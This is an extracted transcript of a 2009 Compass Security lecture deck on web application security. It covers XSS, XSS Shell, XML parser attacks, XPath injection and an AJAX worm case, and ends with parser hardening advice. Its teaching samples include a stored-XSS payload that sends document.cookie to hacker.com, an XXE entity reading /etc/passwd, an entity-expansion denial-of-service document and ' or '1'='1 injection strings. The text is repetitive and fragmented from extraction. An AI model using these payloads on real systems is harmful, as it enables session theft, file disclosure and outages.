web application security hsr lektionen - hacking-lab...web application security hsr lektionen ivan...
TRANSCRIPT
Web Application SecurityHSR LektionenHSR Lektionen
Ivan Bütler
Mai 2009
www.csnc.ch
Web Application Security
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
E1 - Who am I
^ Ivan Bütler, Uznach
^ Speaker at Blackhat 2008 Las Vegas
^ Born 31.12.1970
^ Founder of Compass Security AG
© Compass Security AG
^ Founder of Compass Security AG
^ Founder of Swiss Cyber Storm II
^ Passionate Security Researcher
^ Husband of Cornelia and father of Tim and Nick (2000/2002)
^ Proud Swiss Citizen
^ Speaker at Blackhat 2008 Las Vegas
^ Founder of Compass Security AG
Slide 2www.csnc.ch
^ Founder of Compass Security AG
^ Founder of Swiss Cyber Storm II
^ Passionate Security Researcher
^ Husband of Cornelia and father of Tim and Nick (2000/2002)
IT Security is like kayaking
Moving across water
© Compass Security AG
Not moving = losing control!
Continuous
paddling
IT Security is like kayaking
Moving across water
Slide 3www.csnc.ch
Not moving = losing control!
In front of us ....
© Compass Security AG
There are
threats
ahead of us
Slide 4www.csnc.ch
behind us ...
© Compass Security AG Slide 5www.csnc.ch
There are
threats
behind us
Agenda
OWASP Top 10
Cross Site Scripting
AJAX & XML Attacks
Web 2.0 Worm
© Compass Security AG
Web 2.0 Worm
Slide 6www.csnc.ch
OWASP Top 10
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
OWASP Top 10 (Q4 2007)
A1 Cross Site Scripting
A2 Injection Flaws (SQLi)
A3 Malicious File Execution (RFI)
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG
A5 Cross Site Request Forgery
A6 Information Leakage
A7 Broken Auth & Session Management
A8 Insecure Cryptographic Storage
A9 Insecure Communications
A10 Failure to restrict URL Access
OWASP Top 10 (Q4 2007)
Malicious File Execution (RFI)
Insecure Direct Object Reference
Cross Site Request Forgery
Slide 8www.csnc.ch
Cross Site Request Forgery
Broken Auth & Session Management
Insecure Cryptographic Storage
Failure to restrict URL Access
A1: Cross Site Scripting
OWASP Definition
XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
© Compass Security AG
sites, possibly introduce worms, etc.
XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
Slide 9www.csnc.ch
sites, possibly introduce worms, etc.
Cross-Site ScriptingCross-Site TracingCross-Site TracingSecond Order InjectionHTML Injection
Site Scripting
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
Second Order Injection
Attack Vector
Protocol
© Compass Security AG
Attrackting!!
JavaScript from
www.abc.com is loaded to
the client (Malware)
Slide 11www.csnc.ch
Authentication into Web Application
Session Hijacking (re-use client session)
JavaScript
JavaScript Malware
JavaScript from
www.abc.com is loaded to
the client (Malware)
© Compass Security AG
JavaScript Malware
“ Was previously loaded to the web application by the attacker
“ Exploitation of a Cross Site Scripting vulnerability
“ Is part of the „attrackting“ vector
“ HTML formatted mail inlcuding XSS attack vector
“ Obfuscated via URL redirection including XSS attack vector
is loaded to
the client (Malware)
Slide 12www.csnc.ch
Was previously loaded to the web application by the attacker
Exploitation of a Cross Site Scripting vulnerability
Is part of the „attrackting“ vector
HTML formatted mail inlcuding XSS attack vector
Obfuscated via URL redirection including XSS attack
JavaScript
JavaScript
“ Program that is run client
“ Ususally automates client activities (clicking, etc)
“ Heavily used in Web2.0 (Ajax)
“ Is able to access browser envs (document.cookie)
“ In normal circumstances it is „good code“
“ If used by hackers -> „malicious code“
© Compass Security AG
“ If used by hackers -> „malicious code“
JavaScript Malware
“ Denial of Service attacks
“ Spy the client settings
“ Background http requests to foreign web sites
“ Clicks through an application automatically (add malicous payment instructions)
“ API for the browser and its features
Program that is run client-side
Ususally automates client activities (clicking, etc)
Heavily used in Web2.0 (Ajax)
Is able to access browser envs (document.cookie)
In normal circumstances it is „good code“
> „malicious code“
Slide 13www.csnc.ch
> „malicious code“
Background http requests to foreign web sites
Clicks through an application automatically (add malicous payment
API for the browser and its features
Session Steeling Sequence
Malicious JavaScript performs its own request
Hacker Client
POST /document.jsp?id=898&value=<script>location.href="http://hacker.com/"+document.cookie</script>
© Compass Security AG
GET /session=123
Stores Requestin Log File
Session Steeling Sequence
Malicious JavaScript performs its own request
ClientWeb
Application
POST /document.jsp?id=898&value=<script>location.href="http://hacker.com/"+document.cookie</script>
Stores value
Slide 14www.csnc.ch
GET /app/document.jsp?id=898Cookie: session=123
Response:<script>location.href="http://hacker.com/"
+document.cookie</script>
Stores valuein DB
Testing
Play around with different test strings in request parameters
“ <script>alert('asdf')</script>
“ <script>alert(document.cookie)</script>
“ "<script>alert(document.cookie)</script>
“ "><script>alert(document.cookie)</script>
“ '><script>alert(document.cookie)</script>
© Compass Security AG
'><script>alert(document.cookie)</script>
“ <img src="http://www.bla.com/image.gif" onload="alert(document.cookie)">
In the page returned
“ Search for the presence of test strings
“ Check how the characters get filtered or changed
“ Find out the problem why XSS does not work and try new test strings
Play around with different test strings in request parameters
<script>alert('asdf')</script>
<script>alert(document.cookie)</script>
"<script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
Slide 15www.csnc.ch
'><script>alert(document.cookie)</script>
<img src="http://www.bla.com/image.gif" onload="alert(document.cookie)">
Search for the presence of test strings
Check how the characters get filtered or changed
Find out the problem why XSS does not work and try new test
IFRAME Tag
iframes
“ May contain content of other web sites<iframe src="http://www.csnc.ch/" height="300" width="300"></iframe>
© Compass Security AG
Attacks
“ Faked login dialogs for phishing attacks
“ Retrieval of another page’s content
May contain content of other web sites<iframe src="http://www.csnc.ch/" height="300" width="300"></iframe>
Slide 16www.csnc.ch
Faked login dialogs for phishing attacks
Retrieval of another page’s content
Hacking-Lab
5030 - Cross Site Scripting Lab
© Compass Security AG
Cross Site Scripting Lab
Slide 17www.csnc.ch
Second Order InjectionSecond Order Injection
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
Introduction
Second-Order Code Injection describes the indirect processing of injected code.
The injected code is not activated immediately by the application.
Primary targets are web applications which are feed with data from other applications.
© Compass Security AG
other applications.
Second-Order Code Injection is caused by missing input validation or missing output encoding.
Order Code Injection describes the indirect processing of
The injected code is not activated immediately by the application.
Primary targets are web applications which are feed with data from
Slide 19www.csnc.ch
Order Code Injection is caused by missing input validation or missing output encoding.
Example
Example
© Compass Security AG Slide 20www.csnc.ch
Hacking-Lab
2301 Web Security: Second Order Injection
© Compass Security AG
2301 Web Security: Second Order Injection - Web Services
Slide 21www.csnc.ch
XSS Shell
<script src=......>
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
XSS Shell – Typical Procedure
User Attacker
<
<script src="http
© Compass Security AG
client requests xss shell code
client loads xss shell code
xss gets persistent
poll for commands
poll for commands
send command
execute command
send results
Typical Procedure
serverxssshellserver
Infect server with persistent XSS
script src="http://xssshellserver/xssshell.asp"></script>
visit server
client receives XSS
http://xssshellserver/xssshell.asp"></script>
Slide 23www.csnc.ch
client requests xss shell code
client loads xss shell code
poll for commands
send command
poll for commands
send command
send results
send results
Manual Proof of XSS Shell
HTTP Request to XSS vulnerable AppGET http://www.csnc.ch/webapp/ HTTP/1.1
Host: www.csnc.ch
Cookie:
CSNC=8iLksLJJpgMB4Zl7MpvjKg2ypbiFEY1wPJl8hUjoh49Z3UNFiddu7YSC4THilnP
HTTP Response from XSS vulnerable AppHTTP/1.0 200 OK
© Compass Security AG
...
<script src="http://www.google.ch/ivan.js
...
HTTP Request to XSS Shell ServerGET http://www.google.ch/ivan.js HTTP/1.1
Host: www.google.ch
HTTP Response from XSS Shell ServerHTTP/1.0 200 OK
alert(document.cookie);
Manual Proof of XSS Shell
HTTP Request to XSS vulnerable AppGET http://www.csnc.ch/webapp/ HTTP/1.1
CSNC=8iLksLJJpgMB4Zl7MpvjKg2ypbiFEY1wPJl8hUjoh49Z3UNFiddu7YSC4THilnP
HTTP Response from XSS vulnerable AppJava Script loaded
from XSS Shell
Slide 24www.csnc.ch
script src="http://www.google.ch/ivan.js"></script>
HTTP Request to XSS Shell ServerGET http://www.google.ch/ivan.js HTTP/1.1
HTTP Response from XSS Shell Server
from XSS Shell
Server can access
Cookies from
Vulnerable App
XSS Shell
© Compass Security AG Slide 25www.csnc.ch
XSS Tunnel
Used as local proxy
Tunnels traffic over victim connected to xss
© Compass Security AG
Tunnels traffic over victim connected to xss-shell
Slide 26www.csnc.ch
XSS Tunnel sequence diagram
Attacker XSS Tunnel Vulu
Post blog entry
© Compass Security AG
Request to local proxy
Show respond
XSS Tunnel sequence diagram
Vulu. appl. Victim XSS-Shell
Read blog entry
Get script
Begin polling comands
from xss-shell
Poll for commands
Slide 27www.csnc.ch
Poll for commands
Poll for command
Send commands to xss-shell
Send command
Return respond
Forward respond to xss tunnel client
Request to vulu. appl.
Response from appl.
XSS Shell
XSS Shell
“ Tested with: Firefox, IE6 and IE7
“ Works with persistent XSS or reflected (temporary) XSS
“ XSS Shell communication relies on remote JavaScript
“ loading via <script src=„..“>
“ bypass the same-origin policy
© Compass Security AG
bypass the same-origin policy
“ XSS Shell is Open Source
Tested with: Firefox, IE6 and IE7
Works with persistent XSS or reflected (temporary) XSS
XSS Shell communication relies on remote JavaScript
loading via <script src=„..“>
origin policy
Slide 28www.csnc.ch
origin policy
XSS Shell is Open Source
References
XSS Shell & XSS Tunnelhttp://www.portcullis-security.com/
© Compass Security AG
security.com/
Slide 29www.csnc.ch
Hacking-Lab
2650 RSS Attack and XSSShell
© Compass Security AG
XSSShell
Slide 30www.csnc.ch
AJAX & XML SecurityAJAX & XML Security
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
AJAX Request/Response
© Compass Security AG
Source: Wikipedia
AJAX Request/Response
New engineNew engineNew engineNew engine built-in
newer browsers!
Interactive GUIInteractive GUIInteractive GUIInteractive GUI
Asynchronous Asynchronous Asynchronous Asynchronous
processingprocessingprocessingprocessing ; not every
Slide 32www.csnc.ch
processingprocessingprocessingprocessing ; not every
action needs to be
started by pressing the
submit button
Asynchronous Asynchronous Asynchronous Asynchronous
processingprocessingprocessingprocessing ; AJAX
updates the browser
window (content)
XMLHttpRequest (XHR)
XmlHttpRequest is a browser API to perform background HTTP requests from JavaScript
Invented by Microsoft in 2000
IE 5.0 / 6.0: COM/ActiveX object „Microsoft.XmlHttp“
“ ActiveX must be enabled
© Compass Security AG
“ ActiveX must be enabled
IE 7.0, Firefox, Opera, Safari and other browsers:Native JavaScript object „XmlHttpRequest“
“ ActiveX not required
“ Portable
XmlHttpRequest is a browser API to perform background HTTP
Invented by Microsoft in 2000
IE 5.0 / 6.0: COM/ActiveX object „Microsoft.XmlHttp“
ActiveX must be enabled
Slide 33www.csnc.ch
ActiveX must be enabled
IE 7.0, Firefox, Opera, Safari and other browsers:Native JavaScript object „XmlHttpRequest“
XMLHttpRequest (XHR)
© Compass Security AG Slide 34www.csnc.ch
Data Exchange Formats
Upstream Data Format
© Compass Security AG
Downstream Data Format
Data Format
Slide 35www.csnc.ch
Data Format
Upstream Data Formats
Possible data formats:
“ GET parameters
“ POST parameters
“ XML
“ SOAP
Some server-side API is provided
© Compass Security AG
Some server-side API is provided
Often maps to server-side objects and their functions
“ AJAX calls in this case are like remote method invocations
side API is provided
Slide 36www.csnc.ch
side API is provided
side objects and their functions
AJAX calls in this case are like remote method invocations
Upstream: HTTP GET Parameters
GET /dyn/req?call=foo
© Compass Security AG
GET /dyn/req?call=foo
...
: HTTP GET Parameters
call=foo&arg=bar HTTP/1.1
Slide 37www.csnc.ch
call=foo&arg=bar HTTP/1.1
Upstream: HTTP POST Parameters
© Compass Security AG
POST /dyn/req HTTP/1.1
Content-Type: application/
...
call=foo&arg=bar
: HTTP POST Parameters
Slide 38www.csnc.ch
/dyn/req HTTP/1.1
Type: application/x-www-form-urlencoded
Upstream: XML
POST /dyn/req HTTP/1.1
© Compass Security AG
POST /dyn/req HTTP/1.1
Content-Type: text/xml
...
<?xml version="1.0" encoding="utf
<request connectionId="cxooiqM">
<call type="foo">
<argument name="
</call>
</request>
/dyn/req HTTP/1.1
Slide 39www.csnc.ch
/dyn/req HTTP/1.1
text/xml
<?xml version="1.0" encoding="utf-8"?>
connectionId="cxooiqM">
">
name="bar">true</argument>
Upstream: SOAP
POST /dyn/req HTTP/1.1
© Compass Security AG
POST /dyn/req HTTP/1.1
Content-Type: application/soap
...
<?xml version="1.0" encoding="utf
<Envelope xmlns="http://schemas.xmlsoap.org
<Body>
...
</Body>
</Envelope>
/dyn/req HTTP/1.1
Slide 40www.csnc.ch
/dyn/req HTTP/1.1
application/soap-xml
<?xml version="1.0" encoding="utf-8"?>
xmlns="http://schemas.xmlsoap.org
/soap/envelope">
Downstream: XML
HTTP/1.1 200 OK
© Compass Security AG
HTTP/1.1 200 OK
Content-Type: text/xml
...
<?xml version="1.0" encoding="utf
<response>
<result type="login
<status>false</status
<msg>Username or password invalid.<
</result>
</response>
Slide 41www.csnc.ch
text/xml
<?xml version="1.0" encoding="utf-8"?>
login">
/status>
>Username or password invalid.</msg>
Downstream: JavaScript
HTTP/1.1 200 OK
© Compass Security AG
HTTP/1.1 200 OK
Content-Type: text/javascript
...
LibJs.user='nobody';
LibJs.groups=['member','nobody','wnc5Xh'];
$L('kYP64i').__render([$E('h1',{className:
'Compiled',attributes:{},children:[$T(LibJ
s.Compiler.fromAscii('Hello world!'))] ...
LibJs.Server.__onComplete(1664);
: JavaScript
Slide 42www.csnc.ch
text/javascript
LibJs.user='nobody';
LibJs.groups=['member','nobody','wnc5Xh'];
$L('kYP64i').__render([$E('h1',{className:
'Compiled',attributes:{},children:[$T(LibJ
s.Compiler.fromAscii('Hello world!'))] ...
LibJs.Server.__onComplete(1664);
Downstream: JSON
HTTP/1.1 200 OK
© Compass Security AG
HTTP/1.1 200 OK
Content-Type: text/x-
...
{"menu": {
"id": "file",
"popup": {
"menuitem": [
{"value": "New", "onclick": "NewDoc()"},
{"value": "Open", "onclick": "OpenDoc()"},
{"value": "Close", "onclick": "CloseDoc()"}
]}}}
Slide 43www.csnc.ch
-json
{"value": "New", "onclick": "NewDoc()"},
{"value": "Open", "onclick": "OpenDoc()"},
{"value": "Close", "onclick": "CloseDoc()"}
Downstream: Custom
HTTP/1.1 200 OK
© Compass Security AG
HTTP/1.1 200 OK
Content-Type: text/x
...
{OK}["53723","84268","78357","27843"]
Slide 44www.csnc.ch
text/x-gwt
{OK}["53723","84268","78357","27843"]
XML Attack VectorXML Attack Vector
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
Attack Targets
Possible attack targets
“ network service“ XML generator“ XML parser“ application code
© Compass Security AG
Conclusion“ XML core security
standards are onlyof limited value whenthe XML generator orparser is the target ofthe attack.
“ Therefore additionalprotection is required.
Slide 46www.csnc.ch
XML Parser AttacksXML Parser Attacks
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
XML Parser Attacks
XML technology allows to offload the marshaling issues
“ No custom serialization protocols required
“ Generic approach to handle different data structures
“ Easy transformation of XML documents into business objects
Therefore XML parsers are very powerful
© Compass Security AG
Therefore XML parsers are very powerful
“ highly generic
“ highly dynamic
This is the foundation for XML parser based attacks!
XML technology allows to offload the marshaling issues
No custom serialization protocols required
Generic approach to handle different data structures
Easy transformation of XML documents into business objects
Therefore XML parsers are very powerful
Slide 48www.csnc.ch
Therefore XML parsers are very powerful
This is the foundation for XML parser based attacks!
XML Parser: Verbose Error Messages
Often XML parsers return very verbose information about occurred problems
“ Schema definitions and the location where the parsing error has occurred.
“ Java Stack Traces or parts of it
© Compass Security AG
<error>
<message>
XMLParserError: Error on line 3: cvc
type.2.4.b: The content of element 'header' is not
complete. It must match '(((((((("":senderid),
"":reference)), ("":receipientid){0
</message>
</error>
XML Parser: Verbose Error Messages
Often XML parsers return very verbose information about occurred
Schema definitions and the location where the parsing error
Java Stack Traces or parts of it
Slide 49www.csnc.ch
XMLParserError: Error on line 3: cvc-complex-
type.2.4.b: The content of element 'header' is not
It must match '(((((((("":senderid),
"":reference)), ("":receipientid){0-1}),...'.
XML Parser: Overlong XML Documents
Although recursive entity definitions are not allowed by XML overlong documents can still be constructed
<?xml version="1.0" encoding ="UTF
<!DOCTYPE sample [<!ENTITY x100 “A very CPU consuming task :)"><!ENTITY x99 "&x100;&x100;">...
© Compass Security AG
...<!ENTITY x1 "&x2;&x2;">
]>
<SOAP-ENV:Envelope xmlns:SOAP<SOAP-ENV:Body>
<ns1:aaa xmlns:ns1="urn:aaa" SOAP
<sample xsi:type="xsd:string"></ns1:aaa>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
XML Parser: Overlong XML Documents
Although recursive entity definitions are not allowed by XML overlong documents can still be constructed
<?xml version="1.0" encoding ="UTF-8"?>
<!ENTITY x100 “A very CPU consuming task :)"><!ENTITY x99 "&x100;&x100;">
Slide 50www.csnc.ch
<!ENTITY x1 "&x2;&x2;">
ENV:Envelope xmlns:SOAP-ENV=...>
<ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV=...>
<sample xsi:type="xsd:string">&x1;</sample>
XML Parser: Overlong XML Documents
Attack on DOM parser
<?xml version="1.0" encoding ="UTF
<dom-attack>
<dom-attack>
<dom-attack>
© Compass Security AG
<dom-attack>
<dom-attack>
<dom-attack>
<dom-attack>...</dom
</dom-attack>
</dom-attack>
</dom-attack>
</dom-attack>
</dom-attack>
XML Parser: Overlong XML Documents
<?xml version="1.0" encoding ="UTF-8"?>
Slide 51www.csnc.ch
attack>
attack>...</dom-attack>
attack>
XML Parser: XXE
XXE à XML External Entity Attacks
Attack Range
“ DoS – Denial of Service Attacks
“ Inclusion of local files into XML documents
“ Port scanning from the system where the XML parser is located
“ Overloading of XML-Schema from foreign locations
© Compass Security AG
“ Overloading of XML-Schema from foreign locations
ntity Attacks
Denial of Service Attacks
Inclusion of local files into XML documents
Port scanning from the system where the XML parser is located
Schema from foreign locations
Slide 52www.csnc.ch
Schema from foreign locations
XML Parser: XXE Denial of Service
Denial of Service
“ Loading of content from local devices like /dev/zero
<?xml version="1.0" encoding="ISO
<!DOCTYPE sample SYSTEM
...
© Compass Security AG
...
XML Parser: XXE Denial of Service
Loading of content from local devices like /dev/zero
<?xml version="1.0" encoding="ISO-8859-1"?>
SYSTEM "/dev/zero">
Slide 53www.csnc.ch
XML Parser: XXE Local Connect Scan
Using external DTD references it is possible to perform TCP port scans.
Request<?xml version="1.0" encoding="ISO
<!DOCTYPE sample PUBLIC
...
© Compass Security AG
Response<?xml version="1.0" encoding="ISO
<error>
<type>FATAL</type>
<message>
XMLParserError: Error in building: Connection refused
</message>
</error>
XML Parser: XXE Local Connect Scan
Using external DTD references it is possible to perform TCP port
<?xml version="1.0" encoding="ISO-8859-1"?>
PUBLIC "..." "http://localhost:99">
Slide 54www.csnc.ch
<?xml version="1.0" encoding="ISO-8859-1"?>
XMLParserError: Error in building: Connection refused
XML Parser: XXE DNS Resolution
Request<?xml version="1.0" encoding="ISO
<!DOCTYPE sample PUBLIC "..." "
...
Response<?xml version="1.0" encoding="ISO
© Compass Security AG
<?xml version="1.0" encoding="ISO
<error>
<type>FATAL</type>
<message>
XMLParserError: Error in building: Host not found:
www.csnc.ch
</message>
</error>
XML Parser: XXE DNS Resolution
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE sample PUBLIC "..." "http://www.csnc.ch:99">
<?xml version="1.0" encoding="ISO-8859-1"?>
Slide 55www.csnc.ch
<?xml version="1.0" encoding="ISO-8859-1"?>
XMLParserError: Error in building: Host not found:
XML Parser: XXE Global Connect Scan
Request<?xml version="1.0" encoding="ISO
<!DOCTYPE sample PUBLIC
...
Response<?xml version="1.0" encoding="ISO
© Compass Security AG
<?xml version="1.0" encoding="ISO
<error>
<type>FATAL</type>
<message>
XMLParserError: Error in building: Connection timeout
</message>
</error>
XML Parser: XXE Global Connect Scan
<?xml version="1.0" encoding="ISO-8859-1"?>
PUBLIC "..." "http://www.google.com">
<?xml version="1.0" encoding="ISO-8859-1"?>
Slide 56www.csnc.ch
<?xml version="1.0" encoding="ISO-8859-1"?>
XMLParserError: Error in building: Connection timeout
XML Parser: XXE File Inclusion
DTD allows the inclusion of documents
“ XML documents“ web.xml
“ Any other file (difficult since XML parsers often require the content to be parseable)“ /etc/passwd
Request
© Compass Security AG
Request<?xml version="1.0" encoding="ISO
<!DOCTYPE request [
<!ENTITY include SYSTEM "/etc/passwd"
]>
<request>
<description>&include;
...
</request>
XML Parser: XXE File Inclusion
DTD allows the inclusion of documents
Any other file (difficult since XML parsers often require the content to be parseable)
Slide 57www.csnc.ch
<?xml version="1.0" encoding="ISO-8859-1"?>
include SYSTEM "/etc/passwd">
&include;</description>
XML Parser: Example
Request
<?xml version="1.0" encoding="ISO
<!DOCTYPE request [
<!ENTITY include SYSTEM “file=/etc/passwd"
]>
<request>
© Compass Security AG
<request>
<description>&include;
...
</request>
XML
Response
<?xml version="1.0" encoding="ISO-8859-1"?>
include SYSTEM “file=/etc/passwd">
Slide 58www.csnc.ch
&include;</description>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
XML Parser: External XML Schema
XML schemas can be stored remote
Request<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap..."
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema
© Compass Security AG
xmlns:xsi="http://www.w3.org/2001/XMLSchema
xsi:schemaLocation="http://schemas.xmlsoap.org/so.../
http://www.hacker.com/hack.txt">
<soapenv:Body>
...
</soapenv:Body>
</soapenv:Envelope>
Space characterrequired
XML Parser: External XML Schema
XML schemas can be stored remote
xmlns:soapenv="http://schemas.xmlsoap.org/soap..."
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance“
Slide 59www.csnc.ch
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance“
xsi:schemaLocation="http://schemas.xmlsoap.org/so.../
http://www.hacker.com/hack.txt">
Hacking-Lab
2600 XML Attacks
© Compass Security AG Slide 60www.csnc.ch
Mitigation XML AttacksXerces HardeningXerces HardeningMitigation XML Attacks
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
Xerces Hardening
All previous attacks are the result of weakly configured XML parsers.
To be secure against these attacks the XML parsers need to be hardened.
© Compass Security AG
Hardening is a term which describes a process where a component is setup in the most minimal and secure configuration required to run the application.
All previous attacks are the result of weakly configured
To be secure against these attacks the XML parsers need to be hardened.
Slide 62www.csnc.ch
is a term which describes a process where a component is setup in the most minimal and secure configuration required to run the application.
The parser can be configured as follows
SAXParser p = new SAXParser();
p.setFeature("...", true|false);
Validate schemas featureshttp://xml.org/sax/features/validation
Xerces Hardening
© Compass Security AG
http://xml.org/sax/features/validation
http://xml.org/sax/features/namespace
http://xml.org/sax/features/namespaces
http://apache.org/xml/features/validation/schema
http://apache.org/xml/features/validation/schema
àààà true
The parser can be configured as follows
SAXParser p = new SAXParser();
p.setFeature("...", true|false);
http://xml.org/sax/features/validation àààà true
Slide 63www.csnc.ch
http://xml.org/sax/features/validation àààà true
http://xml.org/sax/features/namespace-prefixes àààà true
http://xml.org/sax/features/namespaces àààà true
http://apache.org/xml/features/validation/schema àààà true
http://apache.org/xml/features/validation/schema-full-checking
Xerces Hardening
Avoid external entity attackshttp://xml.org/sax/features/external
http://xml.org/sax/features/externalfalse
http://apache.org/xml/features/disallow
Avoid resolving of external XML schema locations
© Compass Security AG
Avoid resolving of external XML schema locationsp.setEntityResolver(new MyResolver()
Utilize Security Manager to limit number of nodes and entity expansionsp.setProperty("http://apache.org/xml/properties/security-manager", "org.apache.xerces.util.SecurityManager"
Check XML against local server
http://xml.org/sax/features/external-general-entities à false
http://xml.org/sax/features/external-parameter-entities à
http://apache.org/xml/features/disallow-doctype-decl à true
Avoid resolving of external XML schema locations
Slide 64www.csnc.ch
Avoid resolving of external XML schema locationsnew MyResolver());
Utilize Security Manager to limit number of nodes and entity
("http://apache.org/xml/properties/securit"org.apache.xerces.util.SecurityManager");
Check XML against local server-side schemas and DTDs
XPath Injection
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
Introduction
Just like relational databases XML documents need to be queried for information.
To provide a standardized means for querying XML documents XPath is used.
© Compass Security AG
XPath is used.
XPath is a basic XML technology is the foundation for other technologies, like
“ XSLT
“ XQuery
Just like relational databases XML documents need to be queried
To provide a standardized means for querying XML documents
Slide 66www.csnc.ch
XPath is a basic XML technology is the foundation for other
XPath
Lets assume following XML document used as a repository for user accounts and their passwords...
<?xml version="1.0" encoding="ISO
<users>
<user>
<username>monsch</username>
© Compass Security AG
<username>monsch</username>
<password>V3riKomplikatet</password>
</user>
<user>
<username>buetler</username>
<password>$eCur1tY</password>
</user>
</users>
Lets assume following XML document used as a repository for user accounts and their passwords...
<?xml version="1.0" encoding="ISO-8859-1"?>
<username>monsch</username>
Slide 67www.csnc.ch
<username>monsch</username>
<password>V3riKomplikatet</password>
<username>buetler</username>
<password>$eCur1tY</password>
XPath
... and an application using this XML document to perform authentication using XPath expressions.
//users/user[
username/text()='
password/text()='
]
© Compass Security AG
]
The red marked strings are the ones embedded from the login form.
But wait?
“ Doesn't this resemble SQL Injection attacks?
... and an application using this XML document to perform authentication using XPath expressions.
username/text()='monsch' and
password/text()='V3riKomplikatet'
Slide 68www.csnc.ch
The red marked strings are the ones embedded from the login
Doesn't this resemble SQL Injection attacks?
XPath Injection
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
XPath Injection
Yes it does!
Unvalidated input parameters can lead to a XPath Injection attack.
//users/user[
© Compass Security AG
//users/user[
username/text()='monsch
password/text()='' or '1'='1
]
This query selects all user nodes within the XML document.
Unvalidated input parameters can lead to a XPath Injection attack.
Slide 70www.csnc.ch
monsch' and
' or '1'='1'
This query selects all user nodes within the XML document.
XPath Injection
XPath Injection
' or '1'='1
© Compass Security AG Slide 71www.csnc.ch
XPath Injection
But if the application tests the number of returned results it probably wont work!
To get a more targeted attack an educated guess can be made about the name of the username node.
© Compass Security AG
about the name of the username node.
This way the attack can be launched against a specific user
//users/user[
username/text()='monsch
password/text()='' or '1'='1' and
username/text()='monsch
]
But if the application tests the number of returned results it
To get a more targeted attack an educated guess can be made about the name of the username node.
Slide 72www.csnc.ch
about the name of the username node.
This way the attack can be launched against a specific user
monsch' and
' or '1'='1' and
username/text()='monsch'
XPath Injection
XPath Injection
' or '1'='1' and
username/text()='monsch'
© Compass Security AG
username/text()='monsch'
Slide 73www.csnc.ch
AJAX Worms AnalysisAJAX Worms Analysis
Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch
Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil
Meebo Worm Movie
http://milw0rm.org/video/watch.php?id=71
© Compass Security AG
http://milw0rm.org/video/watch.php?id=71
Slide 75www.csnc.ch
What is meebo.com
Meebo is a web2.0 (AJAX) based instant messaging platform
Users can chat with each other over a web client
© Compass Security AG
Meebo is a web2.0 (AJAX) based instant messaging platform
Users can chat with each other over a web client
Slide 76www.csnc.ch
Meebo.com Vulnerabilities
The messaging functionality is vulnerable to Cross(XSS)
The following script is executed:
<HTML>yo<SCRIPT
a=„>‘>“>alert(‚XSS‘);</SCRIPT></HTML>
© Compass Security AG
This vulnerability could be used to steal session cookies,... (typical Web1.0 XSS Case)
It can also be used to code a worm, that propagates over the messaging functionality
Meebo.com Vulnerabilities
The messaging functionality is vulnerable to Cross-Site-Scripting
The following script is executed:
a=„>‘>“>alert(‚XSS‘);</SCRIPT></HTML>
Slide 77www.csnc.ch
This vulnerability could be used to steal session cookies,... (typical
It can also be used to code a worm, that propagates over the
Impact
XSS Worm propagates without user input.
Availability of meebo.com can be affected
An attacker could gather session cookies
0-Day Exploits can be distributed by XSS
© Compass Security AG
0-Day Exploits can be distributed by XSS
XSS Worm propagates without user input.
Availability of meebo.com can be affected
An attacker could gather session cookies
Day Exploits can be distributed by XSS-Worms
Slide 78www.csnc.ch
Day Exploits can be distributed by XSS-Worms
Propagation
Friendship
© Compass Security AG
Friendship
Slide 79www.csnc.ch
